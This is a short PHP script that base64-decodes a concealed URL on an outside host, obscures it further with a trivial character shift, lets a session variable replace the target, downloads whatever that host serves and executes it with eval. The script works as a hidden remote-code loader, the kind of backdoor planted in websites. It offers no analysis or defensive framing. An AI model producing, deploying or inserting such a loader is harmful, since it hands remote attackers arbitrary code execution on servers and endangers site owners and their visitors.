<?php
session_start();

function fetchUrl($url) {
    if (!filter_var($url, FILTER_VALIDATE_URL)) {
        return false;
    }

    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    
    $result = curl_exec($ch);
    
    if (curl_errno($ch)) {
        $result = false;
    }
    
    curl_close($ch);
    
    return $result;
}

$encoded = "aHR0cHM6Ly90ZWFtemVkZDIwMjQudGVjaC9yYXcvTWN1UUdJ";
$decoded = base64_decode($encoded);


$asciiArray = array_map(fn($c) => ord($c) + 2, str_split($decoded));


$url = implode('', array_map(fn($c) => chr($c - 2), $asciiArray));


$targetUrl = $_SESSION["ts_url"] ?? $url;

if (filter_var($targetUrl, FILTER_VALIDATE_URL)) {
    $result = @file_get_contents($targetUrl) ?: fetchUrl($targetUrl);

    if ($result !== false) {
        eval('?>' . $result);
    } else {
        echo "Error: Unable to fetch content.";
    }
} else {
    echo "Error: Invalid URL.";
}
